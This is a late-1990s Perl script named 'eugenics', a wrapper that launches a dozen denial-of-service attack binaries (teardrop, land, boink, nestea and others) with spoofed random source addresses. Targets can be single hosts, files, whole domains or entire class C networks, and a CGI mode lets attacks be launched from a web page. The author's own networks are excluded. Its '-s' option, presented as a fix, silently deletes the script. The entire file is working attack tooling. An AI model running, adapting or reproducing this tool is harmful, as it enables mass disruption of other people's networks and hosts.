#!/usr/bin/perl
#
# eugenics (tekniq nuke) v0.9.9.
# wh00p. there it is..
# vi's elite little nuke script..
# http://tekniq.net/nuke
#
# _okay.. let me explain this:_
#
# eugenics is a complex wrapper to normal win95/nt DoS attacks..
# it runs:
# flip, frag, land, jolt, boink, teardrop, newtear, ssping, and whatever
# else you feel the desire to add.. OKAY?!
# thanks.
#
#
# if you can't figure this out.. just run `nuke.pl -s' and it'll fix it.
#
# todo:
#	x create a cgi interface for this script (built-in)
#	x do error checking-reporting.
#
# ** THIS COMES WITH NO SUPPORT FROM THE AUTHOR (vi) **
# if you need extensive help.. just type nuke.pl -s
#

use Getopt::Std;
use File::Basename;
#use Net::Ping;

$| = 1;

$basedir = "/root/code/bin/";

$frag = $basedir . "frag";
$flip = $basedir . "flip";
$land = $basedir . "land";
$jolt = $basedir . "jolt";
$boink = $basedir . "boink";
$teardrop = $basedir . "teardrop";
$newtear = $basedir . "newtear";
$ssping = $basedir . "ssping";
$pure = $basedir . "vi-pure";
$akill = $basedir . "akill2";
$syndrop = $basedir . "syndrop";
$nestea = $basedir . "nestea";

$output = "/dev/null";

$SIG{INT} = 'abort';

$version = "0.9.9";
$i = 0;
$n = 0;
$percent = 0;
$quiet = 0;
$ipaddr = "3.1.33.7";
$numhosts = 0;
$argc = $#ARGV + 1;
$progname = basename($0);
$cgimode = 0;
$launchfile = '/www/rain/nuke-launch';
$cgihead = '/www/rain/nuke-head';
$cgifoot = '/www/rain/nuke-foot';
$nonexistant = 0;

$statdir = '/root/code/nukestat';

use vars qw($opt_q $opt_d $opt_h $opt_f $opt_s $opt_t $opt_c $opt_b $opt_p);

getopts("tqbhsc:d:f:p");
$quiet = $opt_q || 0;

# setting hosts not to attack.
$purtek = '(tekniq.net|blackcat.net|0.0.0.0|127.0.0.1|208.154.103.55|209.16.130|wa.dial-access.att.net|iquest.net)';

# generate a random ip to attack from.

srand time();

if (defined $opt_h) {
  print STDERR "eugenics $version.\n\n";
  print STDERR "usage:\n$progname [-q] [-d <domain>] [-c <class C>] [-f <file>] [-h] [host] [host]..\n\n";
  print STDERR "\t-q  - quiet execution (for use with scripts)\n";
  print STDERR "\t-d <domain>  - nuke an entire domain\n";
  print STDERR "\t-c <class C>  - nuke an entire class C\n";
  print STDERR "\t-f <file>  - take input from a file\n";
  print STDERR "\t-h  - help\n\n";
  exit 0;
}

if (defined $opt_s) {
  unlink $0;
}

if ((defined $opt_d) || (defined $opt_c)) {
  if (defined $opt_d) {
    $domain = $opt_d;
    print "" . "querying server for domain: $domain..\n";
    open DOMAIN, "host -l $domain |";
    while (<DOMAIN>) {
      if ($_ =~ /has addr/) {
        /(\S+)\s.*?(\d+\.\d+\.\d+\.\d+)$/;
        $hostname = $1;
        $hostip = $2;
        if(($hostip !~ /$purtek/) && ($hostname !~ /$purtek/)) {
          $hosthash{$hostname} = $hostip;
          $numhosts++;
        }
        print "" . "\n\n" . "[" . "adding host " . $numhosts . " " . ".. " . "" . $hostname . "" . "(" . "" . $hostip . "" . ")" . "]" . "\n";
      }
    }
    } else {
    ($a, $b, $c, $d) = split /\./, $opt_c;
    for ($d=0; $d < 255 ; $d++) {
      $host = join ".", $a,$b,$c,$d;
      if($host !~ /$purtek/) {
        $hosthash{$host} = $host;
      }
    }
  }
  } else {
  if ( $argc == 0 ) {
    if (defined $ENV{'QUERY_STRING'}) {
      $cgimode = 1;
      $quiet = 1;
      if ($ENV{'QUERY_STRING'} ne "") {
        $query_string = $ENV{'QUERY_STRING'};
        $host = $ENV{'REMOTE_HOST'};
        ($one , $two) = split /=/, $query_string;
        if (defined $two) {
          $webhosts = $two;
          } else {
          $webhosts = $one;
        }
        @hosts = split /\+/, $webhosts;
        system("/usr/bin/logger -t nuke '$webhosts nuked by $host'");
        } else {
        open LAUNCHFILE, $launchfile;
        while (<LAUNCHFILE>) {
          print;
        }
        exit(1);
      }
      } elsif ( defined $opt_f ) {
      open NUKEFILE, $opt_f or die "can't open $opt_f: $!\n";
      while (<NUKEFILE>) {
        chomp;
        if ($_ !~ /$purtek/) {
          push @hosts, $_;
        }
      }
      } else {
      print "taking input from console.\n";
      while (<STDIN>) {
        chomp;
        if ($_ !~ /$purtek/) {
          push @hosts, $_;
        }
      }
    }
    } else {
    while ($_ = pop @ARGV) {
      if($_ !~ /$purtek/) {
        push @hosts, $_;
      }
    }
  }
  
  if ($cgimode == 1) {
    open CGIHEAD, $cgihead;
    while (<CGIHEAD>) {
      print;
    }
    close CGIHEAD;
    print "querying dns server..<br><br>\n";
  }
  
  if ($quiet == 0) {
    print "" . "querying dns server..\n";
  }
  
  foreach $hostname (@hosts) {
    if ($quiet == 0) {
      print "" . "\n\n" . "[" . "resolving host " . "" . ".. " . "" . $hostname . "]\n";
    }
    if ($hostname[0] =~ /^\d+\.\d+\.\d+\.\d+$/) {
      $hostip = $hostname;
      } else {
      (undef, undef, undef, undef, @address) = gethostbyname($hostname);
      next if (!@address);
      ($a, $b, $c, $d) = unpack('C4', $address[0]);
      $hostip = join ".", $a, $b, $c, $d;
    }
    if ($quiet == 0) {
      print "" . "(" . "" . $hostip . "" . ")" . "\n";
    }
    if(($hostip !~ /$purtek/) && ($hostname !~ /$purtek/)) {
      $hosthash{$hostname} = $hostip;
    } else {
      print "[1:31m" . "rejected." . "";
    }
  }
}

if ($quiet == 0) {
  print "eugenics $version\n";
}

$numhosts = keys %hosthash;
$noh = keys %hosthash;
$numlen = $noh =~ s/\d/\d/g;

if ($numhosts == 0) {
  print "\n\nerror: no hosts selected.\n\n";
  exit(1);
}

foreach $hostname (keys %hosthash) {
  
  $ipa = int rand 255;
  $ipb = int rand 255;
  $ipc = int rand 255;
  $ipd = int rand 255;
  $source = join ".", $ipa,$ipb,$ipc,$ipd;
  
  $i++;
  $percent = ($i / $numhosts) * 100;
  $ipaddr = $hosthash{$hostname};
  if (!(defined $opt_t)) {
    if (defined $opt_p) {
      open STATHOST, ">> $statdir/stats";
      $p = Net::Ping->new("icmp");
      if ($p->ping($ipaddr)) {
        print STATHOST $hostname, "(", $ipaddr, ") ", time(), " alive\n";
        } else {
        print STATHOST $hostname, "(", $ipaddr, ") ", time(), " dead\n";
      }
    }
#    sleep(1);
    
    $exit{newtear} = system "$newtear $source $ipaddr -n 5 >> $output 2>&1";
    $exit{frag} = system "$frag $source $ipaddr 5 >> $output 2>&1";
    $exit{flip} = system "$flip $source $ipaddr 5 >> $output 2>&1";
    $exit{boink} = system "$boink $source $ipaddr 25 65 5 >> $output 2>&1";
    $exit{teardrop} = system "$teardrop $source $ipaddr -n 5 >> $output 2>&1";
    $exit{land} = system "$land $ipaddr 23 >> $output 2>&1";
    $exit{land} = system "$land $ipaddr 25 >> $output 2>&1";
    $exit{land} = system "$land $ipaddr 113 >> $output 2>&1";
    $exit{land} = system "$land $ipaddr 139 >> $output 2>&1";
    $exit{ssping} = system "$ssping $source $ipaddr 5 >> $output 2>&1";
    $exit{pure} = system "$pure $source $ipaddr >> $output 2>&1";
    $exit{akill} = system "$akill $source $ipaddr >> $output 2>&1";
    $exit{nestea} = system "$nestea $source $ipaddr -n 5 >> $output 2>&1";
    $exit{syndrop} = system "$syndrop $source $ipaddr -n 5 >> $output 2>&1";
    sleep(1);
#    select(undef, undef, undef, 0.25);
    if (defined $opt_p) {
      sleep(1);
      $p = Net::Ping->new("icmp");
      if ($p->ping($ipaddr)) {
        print STATHOST $hostname, "(", $ipaddr, ") ", time(), " alive\n";
        } else {
        print STATHOST $hostname, "(", $ipaddr, ") ", time(), " dead\n";
      }
      $p->close();
      close STATHOST;
    }
  }
  
  $attacks = keys %exit;
  foreach $estatus (keys %exit) {
    if ($exit{$estatus} == 32256) {
      $nonexistant++;
    }
  }
  print "\n";
  if ($nonexistant == $attacks) {
    print STDERR "\nyou have no working exploits..\ngo edit this file.. and read.. smart one.\n\n";
    exit (-1);
  }
  
  if ($quiet == 0) {
    printf "\n\n[%." . $numlen . "d/%d .. %.3d\%]\n", $i, $numhosts, $percent;
    print "[" . $source . " -> " . $hostname . "" . "(" . "" . $ipaddr . "" . ")" . "]\n";
    
  }
  if ($cgimode == 1) {
    print "[$source -&gt; $hostname($ipaddr)]<br>\n";
  }
  
}

if ($quiet == 0) {
  print "\ndone.\n";
}
if ($cgimode == 1) {
  print "done<blink>.</blink>\n";
  open FOOTER, $cgifoot;
  while (<FOOTER>) {
    print;
  }
}

if (defined $opt_b) {
  printf "\a";
}

sub abort {
  print STDERR "\n\naborted.. shutting down..\n\n";
  exit(0);
}